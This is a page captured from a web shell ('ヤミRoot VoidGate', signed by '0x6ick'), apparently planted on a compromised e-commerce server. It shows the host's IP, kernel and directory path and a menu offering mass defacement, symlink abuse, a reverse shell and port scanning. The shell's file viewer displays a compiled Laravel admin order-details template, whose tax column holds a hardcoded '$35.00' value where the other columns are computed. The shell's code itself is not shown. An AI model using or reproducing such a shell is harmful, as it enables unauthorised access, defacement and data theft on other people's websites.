ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: 5e95ecaeb92705ea5d6764a0295c6bdc.php
<?php $__env->startSection('title', translate('order_Details')); ?> <?php $__env->startSection('content'); ?> <div class="content container-fluid"> <div class="d-flex justify-content-between align-items-center gap-3 mb-3"> <h2 class="fs-20 mb-0 text-capitalize d-flex align-items-center gap-2"> <img width="20" height="20" src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/all-orders.png')); ?>" alt=""> <span><?php echo e(translate('order_Details')); ?></span> </h2> <div class="d-flex gap-1 align-items-center"> <a href="<?php echo e($previousOrder ? route('admin.orders.details', [$previousOrder['id']]) : 'javascript:'); ?>" class="btn btn-circle text-primary bg-primary bg-opacity-10 <?php echo e($previousOrder ? '' : 'disabled opacity-25'); ?>"> <i class="fi fi-sr-angle-left d-flex"></i> </a> <a href="<?php echo e($nextOrder ? route('admin.orders.details', [$nextOrder['id']]) : 'javascript:'); ?>" class="btn btn-circle text-primary bg-primary bg-opacity-10 <?php echo e($nextOrder ? '' : 'disabled opacity-25'); ?>"> <i class="fi fi-sr-angle-right d-flex"></i> </a> </div> </div> <div class="row gx-2 gy-3" id="printableArea"> <div class="col-lg-8"> <div class="card h-100"> <div class="card-body"> <div class="d-flex flex-wrap gap-2 flex-md-nowrawp justify-content-between mb-4"> <div class="d-flex flex-column gap-3 flex-1"> <h4 class="text-capitalize fs-16 fw-bold"> <?php echo e(translate('Order_Details')); ?> #<?php echo e($order['id']); ?> <?php if($order['order_type'] == 'POS'): ?> <span>(<?php echo e('POS'); ?>)</span> <?php endif; ?> </h4> <div class="fs-12"> <?php echo e(date('d M, Y , h:i A', strtotime($order['created_at']))); ?> </div> </div> <div class="text-sm-end flex-grow-1"> <div class="d-flex flex-wrap gap-2 justify-content-sm-end"> <a class="btn btn-primary" target="_blank" href="<?php echo e(route('admin.orders.generate-invoice',[$order['id']])); ?>"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/back-end/img/icons/uil_invoice.svg')); ?>" alt="" class="mr-1"> <?php echo e(translate('print_Invoice')); ?> </a> </div> <div class="d-flex flex-column gap-2 mt-3"> <div class="order-status d-flex justify-content-sm-end gap-10 text-capitalize fs-12"> <span class="text-dark"><?php echo e(translate('status')); ?>: </span> <?php if($order['order_status']=='pending'): ?> <span class="badge badge-info text-bg-info fw-bold rounded-50 d-flex align-items-center py-1 px-2"> <?php echo e(translate(str_replace('_',' ',$order['order_status']))); ?> </span> <?php elseif($order['order_status']=='failed'): ?> <span class="badge badge-danger text-bg-danger fw-bold rounded-50 d-flex align-items-center py-1 px-2"> <?php echo e(translate(str_replace('_',' ',$order['order_status']))); ?> </span> <?php elseif($order['order_status']=='processing' || $order['order_status']=='out_for_delivery'): ?> <span class="badge badge-warning text-bg-warning fw-bold rounded-50 d-flex align-items-center py-1 px-2"> <?php echo e(translate(str_replace('_',' ',$order['order_status']))); ?> </span> <?php elseif($order['order_status']=='delivered' || $order['order_status']=='confirmed'): ?> <span class="badge badge-success text-bg-success fw-bold rounded-50 d-flex align-items-center py-1 px-2"> <?php echo e(translate(str_replace('_',' ',$order['order_status']))); ?> </span> <?php else: ?> <span class="badge badge-danger text-bg-danger fw-bold rounded-50 d-flex align-items-center py-1 px-2"> <?php echo e(translate(str_replace('_',' ',$order['order_status']))); ?> </span> <?php endif; ?> </div> <div class="payment-method d-flex justify-content-sm-end gap-10 text-capitalize fs-12"> <span class="text-dark"><?php echo e(translate('payment_Method')); ?> :</span> <strong> <?php echo e(translate(str_replace('_',' ',$order['payment_method']))); ?></strong> </div> <?php if(isset($order['transaction_ref']) && $order->payment_method != 'cash_on_delivery' && $order->payment_method != 'pay_by_wallet' && !isset($order->offline_payments)): ?> <div class="reference-code d-flex justify-content-sm-end gap-10 text-capitalize fs-12"> <span class="text-dark"><?php echo e(translate('reference_Code')); ?> :</span> <strong><?php echo e(translate(str_replace('_',' ',$order['transaction_ref']))); ?> <?php echo e($order->payment_method == 'offline_payment' ? '('.$order->payment_by.')':''); ?></strong> </div> <?php endif; ?> <div class="d-flex justify-content-sm-end gap-10 fs-12"> <span class="text-dark"><?php echo e(translate('payment_Status')); ?>:</span> <?php if($order['payment_status']=='paid'): ?> <span class="text-success fw-bold"> <?php echo e(translate('paid')); ?> </span> <?php else: ?> <span class="text-danger fw-bold"> <?php echo e(translate('unpaid')); ?> </span> <?php endif; ?> </div> <?php if(getWebConfig('order_verification') && $order->order_type == "default_type"): ?> <span class="d-flex justify-content-sm-end gap-10 fs-12"> <b> <?php echo e(translate('order_verification_code')); ?> : <?php echo e($order['verification_code']); ?> </b> </span> <?php endif; ?> </div> </div> </div> <div class="table-responsive datatable-custom"> <table class="table fs-12 table-hover table-borderless align-middle"> <thead class="text-capitalize"> <tr> <th><?php echo e(translate('SL')); ?></th> <th><?php echo e(translate('item_details')); ?></th> <th class="text-center"><?php echo e(translate('Qty')); ?></th> <th class="text-end"><?php echo e(translate('item_price')); ?></th> <th class="text-end"><?php echo e(translate('tax')); ?></th> <th class="text-end"><?php echo e(translate('discount')); ?></th> <th class="text-end"><?php echo e(translate('total_price')); ?></th> </tr> </thead> <tbody> <?php ($item_price=0); ?> <?php ($subtotal=0); ?> <?php ($total=0); ?> <?php ($discount=0); ?> <?php ($product_price=0); ?> <?php ($total_product_price=0); ?> <?php $__currentLoopData = $order->details; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$detail): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if ($detail->product) { $productDetails = $detail->product; } else { $productDetails = json_decode($detail->product_details); } ?> <?php if($productDetails): ?> <tr> <td><?php echo e(++$key); ?></td> <td> <div class="media align-items-center gap-10"> <img class="avatar avatar-60 rounded img-fit" src="<?php echo e(getStorageImages(path: $productDetails->thumbnail_full_url, type: 'backend-product')); ?>" alt="<?php echo e(translate('image_description')); ?>"> <div> <h5 class="text-dark fs-12" <?php if(strlen($productDetails->name) > 30): ?> data-bs-toggle="tooltip" title="<?php echo e($productDetails->name); ?>" <?php endif; ?> > <?php echo e(substr($productDetails->name, 0, 30)); ?><?php echo e(strlen($productDetails->name)>30?'...':''); ?> </h5> <div class="fs-10"> <strong><?php echo e(translate('unit_price')); ?> :</strong> <?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $detail['price']))); ?> </div> <?php if($detail->variant): ?> <div class="max-w-150px text-wrap fs-10"> <strong> <?php echo e(translate('variation')); ?> : </strong> <?php echo e($detail['variant']); ?> </div> <?php endif; ?> </div> </div> <?php if(isset($productDetails->digital_product_type) && $productDetails->digital_product_type == 'ready_after_sell'): ?> <button type="button" class="btn btn-sm btn-primary mt-2" title="File Upload" data-bs-toggle="modal" data-bs-target="#fileUploadModal-<?php echo e($detail->id); ?>"> <i class="fi fi-rr-document"></i> <?php echo e(translate('file')); ?> </button> <?php endif; ?> </td> <td class="text-center"><?php echo e($detail['qty']); ?></td> <td class="text-end"><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $detail['price']*$detail['qty']), currencyCode: getCurrencyCode())); ?></td> <td class="text-end">$35.00</td> <td class="text-end"><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $detail['discount']), currencyCode: getCurrencyCode())); ?></td> <?php ($item_price+=$detail['price']*$detail['qty']); ?> <?php ($subtotal=($detail['price']*$detail['qty'])-$detail['discount']); ?> <?php ($product_price = $detail['price']*$detail['qty']); ?> <?php ($total_product_price+=$product_price); ?> <td class="text-end"><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $subtotal), currencyCode: getCurrencyCode())); ?></td> </tr> <?php ($discount+=$detail['discount']); ?> <?php ($total+=$subtotal); ?> <?php endif; ?> <?php ($sellerId=$detail->seller_id); ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </tbody> </table> <?php $__currentLoopData = $order->details; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$detail): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if ($detail->product) { $productDetails = $detail->product; } else { $productDetails = json_decode($detail->product_details); } ?> <?php if($productDetails && $productDetails->product_type == 'digital'): ?> <div class="modal fade" id="fileUploadModal-<?php echo e($detail->id); ?>" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered"> <div class="modal-content"> <form action="<?php echo e(route('admin.orders.digital-file-upload-after-sell')); ?>" method="post" enctype="multipart/form-data" class="form-advance-validation form-advance-inputs-validation form-advance-file-validation non-ajax-form-validate" novalidate="novalidate"> <?php echo csrf_field(); ?> <div class="modal-body"> <?php if(($detail?->digital_file_after_sell_full_url) && isset($detail->digital_file_after_sell_full_url['key'])): ?> <div class="mb-4"> <?php echo e(translate('uploaded_file')); ?> : <span data-file-path="<?php echo e($detail->digital_file_after_sell_full_url['path']); ?>" class="btn btn-success btn-sm getDownloadFileUsingFileUrl" title="<?php echo e(translate('download')); ?>"><i class="fi fi-rr-download"></i> <?php echo e(translate('download')); ?> </span> </div> <?php elseif($productDetails->digital_product_type == 'ready_after_sell' && $detail->digital_file_after_sell): ?> <div class="mb-4"> <?php echo e(translate('uploaded_file')); ?> : <a href="<?php echo e(asset('storage/app/public/product/digital-product/'.$detail->digital_file_after_sell)); ?>" class="btn btn-success btn-sm" title="<?php echo e(translate('download')); ?>"><i class="fi fi-rr-download"></i> <?php echo e(translate('download')); ?></a> </div> <?php elseif($productDetails->digital_product_type == 'ready_product' && $productDetails->digital_file_ready): ?> <div class="mb-4"> <?php echo e(translate('uploaded_file').':'); ?> <a href="<?php echo e(asset('storage/app/public/product/digital-product/'.$productDetails->digital_file_ready)); ?>" class="btn btn-success btn-sm" title="Download"><i class="fi fi-rr-download"></i> <?php echo e(translate('Download')); ?></a> </div> <?php endif; ?> <?php if($productDetails->digital_product_type == 'ready_after_sell'): ?> <input type="file" data-max-size="<?php echo e(getFileUploadMaxSize(type: 'file')); ?>" name="digital_file_after_sell" class="form-control"> <div class="mt-1 text-info"><?php echo e(translate('file_type').': jpg, jpeg, png, gif, zip, pdf'); ?> </div> <input type="hidden" value="<?php echo e($detail->id); ?>" name="order_id"> <?php endif; ?> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal"><?php echo e(translate('close')); ?></button> <?php if($productDetails->digital_product_type == 'ready_after_sell'): ?> <button type="submit" class="btn btn-primary"><?php echo e(translate('upload')); ?></button> <?php endif; ?> </div> </form> </div> </div> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <hr> <?php ($orderTotalPriceSummary = \App\Utils\OrderManager::getOrderTotalPriceSummary(order: $order)); ?> <div class="px-sm-5 overflow-x-auto"> <table class="table table-borderless table-sm mb-0 text-sm-right text-nowrap fs-12"> <tbody> <tr> <td class="text-end text-dark text-capitalize"> <span><?php echo e(translate('item_price')); ?></span></td> <td class="text-end text-dark"> <span><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['itemPrice']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <tr> <td class="text-end text-dark text-capitalize"> <span><?php echo e(translate('item_discount')); ?></span></td> <td class="text-end text-dark"> - <span><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['itemDiscount']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <tr> <td class="text-end text-dark"><span><?php echo e(translate('extra_discount')); ?></span> </td> <td class="text-end text-dark"> <span>- <?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['extraDiscount']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <tr> <td class="text-end text-dark text-capitalize"> <span><?php echo e(translate('sub_total')); ?></span></td> <td class="text-end text-dark"> <span><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['subTotal']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <tr> <td class="text-end text-dark"><span><?php echo e(translate('coupon_discount')); ?></span> </td> <td class="text-end text-dark"> <span>- <?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['couponDiscount']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <?php if($orderTotalPriceSummary['referAndEarnDiscount'] > 0): ?> <tr> <td class="text-end text-dark"> <span><?php echo e(translate('referral_discount')); ?></span></td> <td class="text-end text-dark"> <span>- <?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['referAndEarnDiscount']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <?php endif; ?> <tr> <td class="text-end text-dark text-uppercase"><span><?php echo e(translate('vat')); ?> /<?php echo e(translate('tax')); ?></span></td> <td class="text-end text-dark"> <span><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['taxTotal']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <tr> <td class="text-end text-dark"> <strong><?php echo e(translate('total')); ?></strong> <span class="fs-10 fw-medium"><?php echo e($orderTotalPriceSummary['tax_model'] == 'include' ? '('.translate('Tax_:_Inc.').')' : ''); ?></span> </td> <td class="text-end text-dark"> <strong><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['totalAmount']), currencyCode: getCurrencyCode())); ?></strong> </td> </tr> <?php if($order->order_type == 'pos' || $order->order_type == 'POS'): ?> <tr> <td class="text-end text-dark"><span><?php echo e(translate('paid_amount')); ?></span> </td> <td class="text-end text-dark"> <span><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['paidAmount']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <tr> <td class="text-end text-dark"><span><?php echo e(translate('change_amount')); ?></span> </td> <td class="text-end text-dark"> <span><?php echo e(setCurrencySymbol(amount: usdToDefaultCurrency(amount: $orderTotalPriceSummary['changeAmount']), currencyCode: getCurrencyCode())); ?></span> </td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> <div class="col-lg-4 d-flex flex-column gap-3"> <div class="card"> <?php if($order->customer): ?> <div class="card-body"> <div class="d-flex gap-2 align-items-center justify-content-between mb-3"> <h4 class="d-flex gap-2 fs-14 fw-bold mb-0"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/vendor-information.png')); ?>" alt=""> <?php echo e(translate('customer_information')); ?> </h4> </div> <div class="media flex-wrap gap-3 gap-sm-4"> <div class=""> <img class="avatar rounded-circle avatar-70" src="<?php echo e(getStorageImages(path: $order->customer->image_full_url , type: 'backend-basic')); ?>" alt="<?php echo e(translate('Image')); ?>"> </div> <div class="media-body d-flex flex-column gap-1"> <span class="text-dark"><span class="fw-semibold"><?php echo e($order->customer['f_name'].' '.$order->customer['l_name']); ?> </span></span> <?php if($order?->customer?->email !== 'walking@customer.com'): ?> <span class="text-dark fs-12"> <span class="fw-bold"><?php echo e($orderCount); ?></span> <?php echo e(translate('orders')); ?></span> <span class="text-dark break-all fs-12"> <span class="fw-semibold"><?php echo e($order->customer['phone']); ?></span> </span> <span class="text-dark break-all fs-12"> <?php echo e($order->customer['email']); ?> </span> <?php endif; ?> </div> </div> </div> <?php else: ?> <div class="card-body"> <div class="media align-items-center"> <span><?php echo e(translate('no_customer_found')); ?></span> </div> </div> <?php endif; ?> </div> </div> </div> </div> <div class="modal fade" id="locationModal" tabindex="-1" role="dialog" aria-labelledby="locationModalLabel"> <div class="modal-dialog modal-lg" role="document"> <div class="modal-content"> <div class="modal-header border-0 pb-0 d-flex justify-content-end"> <h3 class="modal-title text-center flex-grow-1" id="locationModalLabel"><?php echo e(translate('location_Data')); ?></h3> <button type="button" class="btn-close border-0 btn-circle bg-section2 shadow-none" data-bs-dismiss="modal" aria-label="Close"> </button> </div> <div class="modal-body"> <div class="row"> <div class="col-md-12 modal_body_map"> <div class="location-map" id="location-map"> <div class="w-100 h-200" id="location_map_canvas"></div> </div> </div> </div> </div> </div> </div> </div> <span id="route-admin-orders-payment-status" data-url="<?php echo e(route('admin.orders.payment-status')); ?>"></span> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.admin.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/pos/order/order-details.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick